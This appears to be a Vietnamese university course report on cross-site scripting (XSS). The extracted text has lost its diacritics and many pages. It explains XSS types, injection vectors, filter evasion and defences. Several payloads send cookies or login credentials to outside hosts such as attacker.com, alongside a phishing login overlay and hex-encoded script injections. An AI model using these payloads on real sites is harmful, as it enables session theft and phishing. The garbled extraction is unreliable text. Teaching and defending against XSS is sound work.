Professional Documents
Culture Documents
C S TP.HCM
AN NINH MNG
BO CO TI MN HC AN NINH MNG
AN NINH MNG
Mc lc
I. GII THIU CHUNG ................................................................................................. 4
II. GII THIU V XSS ................................................................................................. 5
1. Tm hiu XSS ........................................................................................................... 5
2. Hai hnh thc tn ti ca XSS .................................................................................. 5
2.1. Stored XSS ......................................................................................................... 5
2.2. Reflected XSS .................................................................................................... 6
3. Mc nguy him ca XSS..................................................................................... 7
4. Mc tiu m XSS hng ti. .................................................................................... 8
III.HOT NG CA XSS ........................................................................................... 9
IV.CNH GIC VI XSS ............................................................................................ 12
V. KIM TRA LI XSS ............................................................................................... 14
1. S dng Tool .......................................................................................................... 14
2. Th bng Code ....................................................................................................... 14
VI. KHAI THC LI XSS ........................................................................................... 16
1.Tm tt cc bc thc hin ..................................................................................... 17
2. Cc cch thc hin.................................................................................................. 18
2.1. Nghin cu cch ly cookies: .......................................................................... 18
2.2.Nghin cu cch ly account. ........................................................................... 18
2.3. Tn Cng XSS Bng Flash .............................................................................. 19
3. Attacker dng XSS la o ............................................................................... 22
4. Cch vt qua c ch lc k t .............................................................................. 22
AN NINH MNG
AN NINH MNG
AN NINH MNG
AN NINH MNG
AN NINH MNG
Tn cng XSS l tn cng nguy him, cho php k tn cng n cp thng tin trn
my nn nhn thng qua javascript nh n cp cookie, chn m c chin quyn
iu khin
XSS l mt trong nhng li ph bin, c rt nhiu trang web b mc phi li
ny, chnh v th ngy cng c nhiu ngi quan tm n li ny.
Gn y, theo Brian Krebs ca t Washington Post bo co rng hng ngn trang web
khng an ton c xc nh vo nm ngoi, v trang Xssed.com a ra danh sch
gn 13.000 trang trong c nhiu l hng cross-site scripting (XSS).
V d 1: Mt on url m hacker chn Script vo ly cookie ca ngi dng.
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search_te
xt=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
AN NINH MNG
AN NINH MNG
III.HOT NG CA XSS
XSS cho php attacker chn cc on m vo link ca ng dn, thc hin
trn trnh duyt ca ngi dng, dn n vic mt cookies, mt khu, session hay
chn virus
Thng th XSS c dng nh sau:
http://www.xxx.vn//index.php?pg=news&cat=<script>alert(Li XSS)</script>.
V ni dung xut hin trn trnh duyt l mt ci popup c thng tin l Li XSS.
trn v d 1 trn ch minh ha mt cch n gin l thm on m ca mnh vo
trang Web thng qua URL. Nhng thc s th c rt nhiu cch thm
on m JavaScript vi mc ch tn cng kiu XSS. Hacker c th d dng
li dng Document Object Model (DOM) thay i ng cnh v ni dng Web
ng dng.
V d 2: Sau y l danh sch ni c th chn on m:
<a href= "javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<lin kt rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
AN NINH MNG
10
AN NINH MNG
11
vi website pha client m nn nhn trc tip l nhng ngi khch duyt site .
Tt nhin i khi cc hacker cng s dng k thut ny deface cc website nhng
vn ch tn cng vo b mt ca website.
Tht vy, XSS l nhng Client-Side Script, nhng on m ny s ch chy bi
trnh duyt pha client do XSS khng lm nh hng n h thng website nm
trn server.
Mc tiu tn cng ca XSS khng ai khc chnh l nhng ngi s dng khc
ca website, khi h v tnh vo cc trang c cha cc on m nguy him do cc
hacker li h c th b chuyn ti cc website khc, t li homepage, hay nng
hn l mt mt khu, mt cookie thm ch my tnh bn c th s b ci cc loi virus,
backdoor, worm ...
Trong k thut XSS thng th cc link m hacker dng u c m ha nn
ngi dng kh m pht hin ra. Sau y l cch m ho(HEX) cc k t thng
dng trong li XSS ca thanh AddressBar ca Browser.
AN NINH MNG
12
V d 3: Mt a ch c m ha HEX.
http://vieclambank.com/search.php?s=">%3C%73%63%72%69%70%74%20%73%
72%63%25%33%44%68%74%74%70%25%33%41%25%32%46%25%32%46%6A
%73%6E%67%6F%63%2E%76%6E%6E%2E%6D%73%25%32%46%78%73%73
%2E%6A%73%3E%3C%25%32%46%73%63%72%69%70%74%3E
IV.CNH GIC VI XSS
C l khng cn lit k nhng nguy him ca XSS, nhng trn thc t nu bn
c mt cht hiu bit v XSS bn s khng cn phi s chng na. Tht vy bn
hon ton c th trnh khi vic b tn cng bi nhng li XSS nu hiu k v n.
Cc th HTML u c th l cng c cho cc cuc tn cng bi k thut XSS,
trong 2 th IMG v IFRAME c th cho php trnh duyt ca bn load thm cc
website khc khi cc lnh HTML c hin th. V d nh BadTrans Worm mt loi
worm s dng th IFRAME ly lan trong cc h thng c s dng Outlook hay
Outlook Express:
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====---====_ABC1234567890DEF_====
AN NINH MNG
13
Content-Type: audio/x-wav;
name="filename.ext.ext"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>
i khi ang c th bn b chuyn sang mt website khc, bn c ngh rng
bn c th mt mt khu. Trc y, hng lot cc hp th ca Yahoo b mt mt
khu hay b c trm th m khng r nguyn nhn. C l khi cc bn m cc bc
th m khng h cnh gic vi XSS, u phi ch cc file nh km mi c th gy
nguy him cho bn. Ch cn vi mt on m HTML gi trong th bn hon ton
b mt cookie ca mnh:
<form action="http://attacker.com/save.asp" method="post" name="XSS">
<input type="hidden" name="cookie">
</form>
<img border="0" onmouseover="window.document.XSS.cookie.value =
document.cookie; window.document.XSS.submit();" src="none.jpg">
Vy l khi bn nhn th, v nu bn v tnh a con chut qua bc nh gi km
th cng c ngha l bn b ly mt cookie. V vi cookie ly c, cc hacker c
th d dng login hm th ca bn m khng cn bit mt khu ca bn. Thc s ti
cng rt bt ng khi tm thy rng Yahoo khi ngn c hu ht cc mi e
do t cc th HTML li b qua th IMG. Tuy nhin cho ti ngy 12/7/2003 Yahoo
kp thi v l hng nghim trng ny, nhng khng phi v vy m bn mt cnh
gic vi nhng "li" ca website. Nu nh bn gp mt lin kt c dng:
http://example.com/s...document.cookie)</script>
Chc chn bn s phi xem xt k trc khi click vo. C th l s tt JavaScript
cho trnh duyt ca bn trc khi click vo hay t nht cng c mt cht cnh gic.
Nhng nu bn gp mt lin kt nh th ny th sao:
http://example.com/s...72%79%3D<script>
AN NINH MNG
14
AN NINH MNG
15
AN NINH MNG
16
AN NINH MNG
17
AN NINH MNG
18
AN NINH MNG
19
document.body.innerHTML=
<img src=images/system/logo_main.gif alt=VieclamBank width=230 height=48
border=0>
<BR><br><br>
<center>Thng tin ng nhp<BR>
<form action=http://www.hostupfile.com/cookie.php
method=POST><table><TR><TD>Tn ng nhp:</TD><TD><input
name=ten></TD></TR><TR><TD>Mt khu:</TD><TD><input name=mk
type=password></TD></TR><TR><TD></TD><TD><input type=submit
value=Login></TD></TR></table></form>
</center>'
Th ba: Chng ta mt link c li gii thiu hay thng bo gy ch (c
hostname l ca trang web b nhim XSS) . Khi to mt link dng nh sau v
gi mail hay up link ln trang web c nhim XSS: (sau hostname ta thm th Script
vo)
http:// hostxss.com /search.php?s="> <script
src%3Dhttp%3A%2F%2Fjsngoc.vnn.ms%2Fxss.js><%2Fscript>
Khi bn pha ngi dng s c mt trang web gi mo(face site): Ngi
dng khng pht hin ra v khi ng nhp th cookie hay usename v password s
c lu li trong file info.txt trn server ca hacker.
AN NINH MNG
20
V d trn s lm xut hin bng thng bo cha cookie ca trang web cha tp
tin flash . Nh vy l trang web b tn cng, bng cch chn mt on
JavaScript vo ng dng Web thng qua tp tin flash. Mt v d khc r hn v
cch tn cng ny l: y l on lnh trong tp tin flash v s c thi hnh khi
tp tin flash c c:
getURL(javascript:location(http://www.attacker.com?newcookie=+do
cument.cookie))
Nh vy l khi ngi dng xem trang web cha tp tin flash ny th ngay
lp tc cookie ca h do trang web cha tp tin flash to ra s gi v cho hacker.
AN NINH MNG
h/s
wflash.cab#version=6,0,0,0"
WIDTH="60"
HEIGHT="48"
id="1"
ALIGN="">
<PARAM NAME=movie
VALUE="http://www.ke_tan_cong.com/vidu.swf">
<PARAM NAME=quality VALUE=high>
<PARAM NAME=bgcolor VALUE=#FF9900>
<EMBED src=" http://www.ke_tan_cong.com/vidu.swf"
quality=high
bgcolor=#FF9900
WIDTH="60"
HEIGHT="48"
NAME="1"
ALIGN=""
TYPE="application/x-shockwave-flash"
PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">
</EMBED>
</OBJECT>
21
AN NINH MNG
22
Ngoi ra bn hon ton c th dng hm open, close window chuyn hng web
sang mt trang web khc bn mun.
Cn cch ny hay hn : Dng hm write. In ra mt th div t rng l 1024, cao
800. possion : absulitly, left=0, top=0. Nh vy l ci div va to s che ton b mn
hnh, th l ngi dng vo trang la o ca cc attacker!
Attacker c th li dng li ny fishing trn cc H thng thanh ton, game,
shopping, Ngn hng, Tn dng... hoc l chn virus!
4. Cch vt qua c ch lc k t
Nhiu coder khn kho lc ht cc k t c bit nh ' hay + trnh cc vic chn
lnh trn URL tn cng SQL hay XSS nhng mt attacker cao tay s d dng gii
quyt vic ny bng cch s dng m ha HEX thay th khai thc
----------------------------------Hex Usage:
http://www.sitebiXSS.com/a.php?variable=%22%3e%3c%73%63%72%69%70%
74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%
AN NINH MNG
23
3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63
%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%6
3%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%
65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72 %69%70%74%3e
--------------------------------link site chuyn i sang s HEX:
http://www.swingnote.com/tools/txt2hex.php hoc http://ha.ckers.org/xss.html
VII. PHNG CHNG XSS
AN NINH MNG
24
> >
( (
) )
# #
& &
AN NINH MNG
25
AN NINH MNG
26
2. i vi ngi dng.
Cn cu hnh li trnh duyt nhc nh ngi dng c cho thc thi ngn ng
kch bn trn my ca h hay khng? Ty vo mc tin cy m ngi dng s
quyt nh
Dng Firefox: C th ci thm tin ch(Add-on Firefox) YesScript - kim
sot script t web
Dng IE th ta c th vo Options/Setting /..chng ta Disable Script.
Tng t vi Google Chrome v cc trnh duyt khc.
Khi chng ta vo mt trang web mi th ta cn phi cn nhc khi click vo cc
link, v vi email chng ta cn phi kim tra cc link hay nhng hnh nh qung
co tht k. V tm li chng ta s an ton hn khi c s cnh gic cao hn.
AN NINH MNG
27
AN NINH MNG
28